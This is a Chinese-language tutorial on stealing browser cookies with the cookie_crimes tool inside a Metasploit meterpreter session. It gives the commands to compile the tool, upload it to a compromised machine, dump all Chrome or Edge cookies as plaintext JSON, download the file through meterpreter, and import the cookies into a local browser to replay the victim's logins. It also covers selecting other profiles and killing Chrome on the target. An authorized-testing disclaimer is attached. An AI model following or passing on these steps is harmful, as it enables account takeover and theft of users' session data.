发布时间:2026/8/21 14:47:34
Metasploit 集成教程:如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies Metasploit 集成教程如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes写在前面什么是 cookie_crimescookie_crimes是一款开源的 Chrome Cookie 提取工具它的核心卖点是无需 root 权限、无需用户密码、无需解密就能把目标机器上 Chrome甚至 Edge浏览器的全部 Cookies 以整洁的 JSON 格式导出。在Metasploit渗透测试流程中当你拿到一个meterpreter 会话后把 cookie_crimes 上传到目标机器运行即可快速提取目标用户的登录态 Cookie为后续测试提供关键突破口。本教程将带你一步步完成Metasploit 与 cookie_crimes 的集成并演示如何在 meterpreter 会话中提取 Cookies。⚠️ 安全声明本文内容仅限授权测试渗透测试、CTF、应急响应、自有设备。未经授权使用属于违法行为请勿用于非法用途。cookie_crimes 的核心功能一览在动手集成之前先快速了解这个工具能做什么功能特性说明 免权限提取不需要 root、不需要用户密码也不需要解密 Cookies 数据库 跨平台支持覆盖 Windows、Linux、macOS 三大系统 多浏览器兼容支持 Chrome也支持基于 Chromium 的 Microsoft Edge JSON 输出输出格式与 EditThisCookie 扩展兼容可直接导入 任意 Profile可通过修改配置提取任意 Chrome 用户资料目录的 Cookies 单文件编译可编译成独立二进制方便在目标机器上执行核心原理很简单cookie_crimes 启动一个带--headless和--remote-debugging-port9222参数的 Chrome 实例并指向目标的用户数据目录然后通过 WebSocket 调用 Chrome DevTools 协议的Network.getAllCookies接口把 Cookies 一次性拉取出来。整个逻辑都在主脚本 cookie_crimes.py 中。Metasploit 集成前置准备在开始集成前请确认满足以下条件本地环境Python 3.6用于编译二进制Metasploit已安装且已建立目标机器的 meterpreter 会话目标机器安装有 Chrome 或 Edge且会话权限能执行命令。第一步获取 cookie_crimes 源码在本地与目标同系统的机器克隆项目git clone https://gitcode.com/gh_mirrors/co/cookie_crimes cd cookie_crimes第二步编译单文件二进制推荐直接把 Python 脚本上传到目标机器也能运行但目标机器未必有 Python 环境。更稳妥的做法是编译成单文件二进制这也是官方推荐的用法。项目自带的 Makefile 封装了编译命令pip3 install -r requirements.txt makemake实际执行的是pyinstaller -F cookie_crimes.py编译产物会生成在dist/目录下。 注意该项目不支持交叉编译在哪个系统上编译产物就只能跑在哪个系统上。请务必在与你目标机器相同的操作系统上完成编译。第三步在 meterpreter 会话中上传二进制拿到 meterpreter 会话后把编译好的二进制上传到目标机器的临时目录meterpreter upload /path/to/dist/cookie_crimes /tmp/cookie_crimes meterpreter shell如果上传后没有执行权限在 shell 中补一个chmod x即可。第四步在 meterpreter 会话中执行并提取 Cookies进入目标的 shell 后直接运行二进制将输出重定向到文件cd /tmp ./cookie_crimes cookies.json工具会自动完成启动 headless Chrome → 连接远程调试端口 → 调用协议拉取 Cookies → 清理进程的完整流程。几秒钟后cookies.json中就保存了目标浏览器全部站点的 Cookies而且是纯文本形式直接可读。第五步回传并解析 Cookies把结果下载回本地进行分析meterpreter download /tmp/cookies.json然后本地用jq快速过滤出你关心的站点cat cookies.json | jq .[] | select(.domain | contains(example.com))如果想把 Cookies 导入本地 Chrome 浏览器配合 EditThisCookie 扩展复现登录态可以用项目附带的格式化脚本 format_for_editthiscookie.sh 去掉域名开头的点号cat cookies.json | ./format_for_editthiscookie.sh进阶技巧提取指定 Chrome Profile 的 Cookies默认情况下 cookie_crimes 提取的是 Default 资料目录。如果目标用户在 Chrome 中创建了多个 Profile例如 Profile 1只需修改 cookie_crimes.py 顶部的PROFILE_NAME变量再重新编译即可PROFILE_NAME Profile 1工具会通过复制用户资料目录到/tmp的巧妙方式让 Chrome 误以为该目录就是默认资料从而读出对应 Profile 的 Cookies。常见问题排查提取结果为空目标 Chrome 可能正在运行导致用户数据目录被占用可先在目标机器上结束 Chrome 进程再执行macOS 上偶发失败由于 Chrome 更新频繁--headless方式在 macOS 上时好时坏。此时可改用项目附带的 cookie_crimes_macos.sh 脚本它会重启 Chrome 并附加远程调试来读取 Cookies目标没有 Python这正是先编译单文件二进制再上传的原因二进制不依赖目标机器的 Python 环境。总结通过 Metasploit 的 meterpreter 会话集成 cookie_crimes你可以在无需 root、无需密码的情况下快速拿到目标浏览器的完整 Cookie 数据。整个过程只需四步获取源码 → 编译二进制 → 上传执行 → 回传解析。它尤其适合在授权渗透测试中快速评估目标账号的安全状况。记住技术本身是中立的请务必只在授权范围内使用 cookie_crimes做一个守法的安全研究者。️【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻

2026/8/21 14:47:34

请解释一下PHP中的垃圾回收机制。

首先,我们要明白什么是“垃圾”。在这里,“垃圾”指的是程序中不再需要使用的数据。这些数据占用了计算机的内存空间,但是如果我们不去清理它们,它们就会一直待在那里,浪费宝贵的内存资源。那么,PHP中的垃圾…

2026/8/21 14:42:34

小米twrp

驱动解锁 申请解锁小米手机 http://miuirom.xiaomi.com/rom/u1106245679/7.6.727.43/miflash_unlock_7.6.727.43.zip twrp下载 https://twrp.me/xiaomi/ adb下载 https://dl.google.com/android/repository/platform-tools_r34.0.5-windows.zip On your device, go into …

2026/8/21 16:17:48

AI 智能空气炸锅智能功率 MOSFET 完整选型方案

2026年随着 AI 技术在智能烹饪设备中的深度渗透(如精准温控、智能菜单、能量优化),空气炸锅对功率 MOSFET 提出更高要求:高效率、低热耗、快速响应。微碧半导体(VBsemi)基于 Trench 和 SGT 工艺&#xff0c…

2026/8/21 16:17:48

QHotkey源码架构深度剖析:PIMPL模式与单例分发机制揭秘

QHotkey源码架构深度剖析:PIMPL模式与单例分发机制揭秘 【免费下载链接】QHotkey A global shortcut/hotkey for Desktop Qt-Applications 项目地址: https://gitcode.com/gh_mirrors/qh/QHotkey QHotkey 是一个专为桌面 Qt 应用设计的全局热键(G…

2026/8/21 16:17:48

每周挤12小时上课 聊聊中英双语授课的国内EMBA

一、在职读EMBA怎么平衡工作学习时间?对多数企业高管而言,选择中英双语授课的国内EMBA的核心诉求之一,是在不中断日常管理工作的前提下,兼顾语言能力提升与系统化商科知识补充,香港科技大学EMBA中英双语课程采用每月集…

2026/8/21 13:13:49

工业通信系统底层逻辑:04 反射——高频能量撞墙之后会发生什么?

第四篇:反射——高频能量撞墙之后会发生什么? —— 你以为信号已经过去了,其实它正在回来打你 老Q的现场笔记 第五季,我们正式进入工业神经系统层。这里不再是单个设备的战斗,而是整个工厂“经脉”层面的秩序之战。从这一篇开始,你将第一次看清:看似简单的信号传播,背…

2026/8/20 20:11:18

工业传感器与变送器详解:序章 从物理世界到工业数据

序章 从物理世界到工业数据 ——重新认识工业传感器与变送器 工业自动化系统正变得日益复杂。今天的工业现场早已不是简单的控制回路,而是由多层技术共同构成的立体体系:PLC、DCS、SCADA、MES、工业互联网、边缘计算与人工智能。控制系统可以执行复杂算法,工业网络可以实现…

2026/8/21 0:03:13

Linux命令-uucico(UUCP传输程序)

Linux命令-uucico(UUCP传输程序) 🔰简介UUCP 体系简介 📖语法⚙️选项配置文件 💡示例示例 1:基本传输操作示例 2:主模式与从模式示例 3:调试与故障排查示例 4:UUCP 配置…

2026/8/21 0:03:13

Linux命令-uupick(UUCP文件接收工具)

Linux命令-uupick(UUCP文件接收工具)🔰简介uupick 在 UUCP 传输链中的位置📖语法⚙️选项交互命令💡示例示例 1:基本接收操作示例 2:仅处理来自特定系统的文件示例 3:完整 UUCP 文件…

2026/8/21 15:40:01

实测才敢推 AI论文网站 2026最新测评与推荐

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。一、综…

2026/8/21 15:40:01

2026必备!AI论文网站测评:最新推荐与深度对比

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。 一、…

2026/8/21 0:31:27

摆脱论文困扰!盘点2026年全网爆红的的AI论文写作工具

一天写完毕业论文在2026年已不再是天方夜谭。2026年最炸裂、实测能大幅提速的AI论文写作工具,覆盖选题构思、文献整理、内容生成、格式排版等核心场景,真正帮你高效搞定论文难题。 一、全流程王者:一站式搞定论文全链路(一天定稿首…